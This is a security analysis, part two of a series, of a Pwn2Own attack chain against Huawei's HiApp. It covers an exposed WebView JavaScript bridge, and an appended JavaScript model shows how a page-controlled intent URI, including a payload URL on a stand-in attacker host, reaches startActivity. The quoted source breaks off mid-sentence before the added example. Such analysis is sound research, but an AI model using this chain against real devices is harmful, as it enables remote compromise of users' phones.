Pwn2Own Huawei HiApp vulnerability principle and exploitation analysis (part 2) - Black Bar Safety Net

ID MYHACK58:62201890401
Type myhack58
Reporter Anonymous
Modified 2018-06-08T00:00:00


0×01 Preface

This is the second part of "Pwn2Own Huawei HiApp vulnerability principle and exploitation analysis". Reading the first part is the basis for understanding how the attack chain below is put together.

0×02 Vulnerability analysis

Attentive readers may have noticed the Easter egg left in the previous analysis. This article naturally picks up from that egg:

    this.mWebvewDelegate.initView(((Context)this), request); // <- the egg
    this.mWebvewDelegate.loadPage(url);                      // load the url

From the previous analysis we already know that mWebvewDelegate is an instance of InternalWebviewDelegate, so we turn to InternalWebviewDelegate.initView:

    public void initView(Context arg6, Request arg7) {
        this.mContext = arg6;
        WebSettings v0 = this.webview.getSettings();
        ...
        this.webview.removeJavascriptInterface("accessibility");
        this.webview.removeJavascriptInterface("accessibilityTraversal");
        if(Build$VERSION.SDK_INT >= 17) {
            this.webview.removeJavascriptInterface("searchBoxJavaBridge_");
        }
        ...
        this.webview.getSettings().setJavaScriptEnabled(true); // allows page JavaScript to execute
        this.webview.requestFocus();
        this.webview.setWebViewClient(new InternalWebViewClient(this));
        this.webview.setWebChromeClient(new MarketWebChromeClient(this));
        this.webview.getSettings().setBlockNetworkImage(true);
        this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject"); // key point: a Java object is exposed to page JavaScript
        ...
    }

Auditing this code: setJavaScriptEnabled(true) lets loaded pages run JavaScript, and from part one we already know that DNS spoofing lets us make the URL that is finally loaded point at a page or script of our own construction, i.e. we control the JavaScript input. For the semantics of addJavascriptInterface, see the reference articles. The key point is the HiSpaceObject class: on API 17 and later, every method of that class carrying the @JavascriptInterface annotation is callable from page JavaScript, and we control that JavaScript.
These methods include functions such as installing and uninstalling apps. According to the vulnerability author's description, their main goal was RCE, which HiApp alone could not be made to trigger, so a vulnerability in another app had to be found and triggered. The focus here is therefore on whether HiApp can launch other apps, and it does expose just such a method (decompiler output, reconstructed here into equivalent Java without the decompiler's goto labels):

    @JavascriptInterface
    public void launchApp(String pkgName, String uri) {
        a.a("HiSpaceObject", "launchApp"); // log
        Intent intent = new Intent();
        try {
            intent = Intent.parseUri(uri, 0); // key point: the whole Intent is built from a page-controlled string
            intent.setPackage(pkgName);
        } catch (URISyntaxException excrpt) {
            a.d("HiSpaceObject", "uri error!" + excrpt.toString()); // log; intent stays the empty new Intent()
        }
        this.mActivity.startActivity(intent); // finally start the activity; we control this Intent
    }

Analyzing the code above: the method takes two parameters, pkgName and uri, and finally calls startActivity to start an Activity. Here a question naturally arises. If there were no way to pass extra data to the target Activity, we would not control the data flowing into it, and the method would be useless for our purposes. However, since the Intent is produced by Intent.parseUri(uri, 0), is there a way in? Looking at the source code shows the following (see the reference):

    * Flag for use with {@link #toUri} and {@link #parseUri}: the URI string
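The question raised above, what Intent.parseUri(uri, 0) accepts, can be made concrete with a small model. The following is an added example written for this edit, not code from the original article or from HiApp: parseIntentUri() is a simplified re-implementation of the "#Intent;...;end" fragment grammar from AOSP's Intent.parseUri()/toUri() (the field names and the S./B./i./l./f./d. extra prefixes are Android's; scheme=, selector, sourceBounds and URI_INTENT_SCHEME handling are omitted, which matches the flags value 0 used by launchApp), HiSpaceObject is a JavaScript stand-in for the Java bridge object with the same control flow as the decompiled launchApp, and the component and extra names in CRAFTED_URI are placeholders, not a real target.

```javascript
"use strict";
// Added example (not from the original article or from HiApp): model of the data
// flow from page JavaScript through the exposed bridge into Intent.parseUri(uri, 0).

const ACTION_VIEW = "android.intent.action.VIEW";

// Mirror of ComponentName.unflattenFromString(): "pkg/cls" or "pkg/.RelativeCls".
function unflattenComponent(str) {
  const slash = str.indexOf("/");
  if (slash < 0 || slash + 1 >= str.length) return null;
  const pkg = str.slice(0, slash);
  let cls = str.slice(slash + 1);
  if (cls.startsWith(".")) cls = pkg + cls;
  return { pkg, cls };
}

function emptyIntent() {
  return { action: null, data: null, categories: [], type: null,
           flags: 0, pkg: null, component: null, extras: {} };
}

// Simplified Intent.parseUri(uri, 0). Returns a plain object standing in for the
// Intent; throws where Android would throw URISyntaxException. Grammar follows
// AOSP: "<data>#Intent;name=value;...;end", extras written as "<type>.<key>=<value>".
function parseIntentUri(uri) {
  const intent = emptyIntent();
  intent.action = ACTION_VIEW;                 // default before the fragment is read
  const hash = uri.lastIndexOf("#");
  if (hash === -1) {                           // no fragment: ACTION_VIEW on the whole string
    intent.data = uri;
    return intent;
  }
  if (!uri.startsWith("#Intent;", hash)) throw new Error("old-format intent URI not modelled");
  if (hash > 0) intent.data = uri.slice(0, hash);   // text before the fragment becomes the data URI
  let i = hash + "#Intent;".length;
  while (!uri.startsWith("end", i)) {
    const semi = uri.indexOf(";", i);
    if (semi === -1) throw new Error("missing ';' before end");
    let eq = uri.indexOf("=", i);
    if (eq === -1) eq = i - 1;
    const value = eq < semi ? decodeURIComponent(uri.slice(eq + 1, semi)) : "";
    if (uri.startsWith("action=", i))           intent.action = value;
    else if (uri.startsWith("category=", i))    intent.categories.push(value);
    else if (uri.startsWith("type=", i))        intent.type = value;
    else if (uri.startsWith("launchFlags=", i)) intent.flags = Number(value);
    else if (uri.startsWith("package=", i))     intent.pkg = value;
    else if (uri.startsWith("component=", i))   intent.component = unflattenComponent(value);
    else {                                      // typed extra
      const key = decodeURIComponent(uri.slice(i + 2, eq));
      const prefix = uri.slice(i, i + 2);
      if (prefix === "S.")      intent.extras[key] = value;
      else if (prefix === "B.") intent.extras[key] = value === "true";
      else if (prefix === "i." || prefix === "l.") intent.extras[key] = parseInt(value, 10);
      else if (prefix === "f." || prefix === "d.") intent.extras[key] = parseFloat(value);
      else throw new Error("unknown EXTRA type at offset " + i);
    }
    i = semi + 1;
  }
  return intent;
}

// Stand-in for the Java object registered with addJavascriptInterface(..., "HiSpaceObject").
// Same control flow as the decompiled launchApp(): on a parse error the code logs and
// starts an *empty* new Intent(); on success setPackage(pkgName) pins only the package.
const started = [];                 // everything startActivity() would have received
const HiSpaceObject = {
  launchApp(pkgName, uri) {
    let intent;
    try {
      intent = parseIntentUri(uri);
      intent.pkg = pkgName;         // setPackage() overrides any package= in the fragment
    } catch (e) {
      intent = emptyIntent();       // URISyntaxException path: intent = newIntent
    }
    started.push(intent);           // this.mActivity.startActivity(intent)
    return intent;
  },
};

// What a page served after the DNS spoofing from part one could run inside the WebView.
// Component and extra names are placeholders (constructed for this example).
const CRAFTED_URI =
  "https://app.example.test/landing" +
  "#Intent;action=android.intent.action.VIEW;" +
  "component=com.example.victim/.ExportedActivity;" +
  "S.url=https%3A%2F%2Fattacker.example%2Fpayload;i.mode=2;end";
const result = HiSpaceObject.launchApp("com.example.victim", CRAFTED_URI);
// result.component.cls === "com.example.victim.ExportedActivity"
// result.extras.url === "https://attacker.example/payload"
```

Run it with node. The point to take away: because the page controls the string handed to parseUri, it controls the action, component, categories and typed extras of the Intent that reaches startActivity; setPackage(pkgName) only pins the target package, and a fragment with no "#Intent;" still yields an ACTION_VIEW Intent with page-chosen data. The catch branch reproduces the decompiled error path, where a malformed uri results in an empty Intent being started rather than the call being refused.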
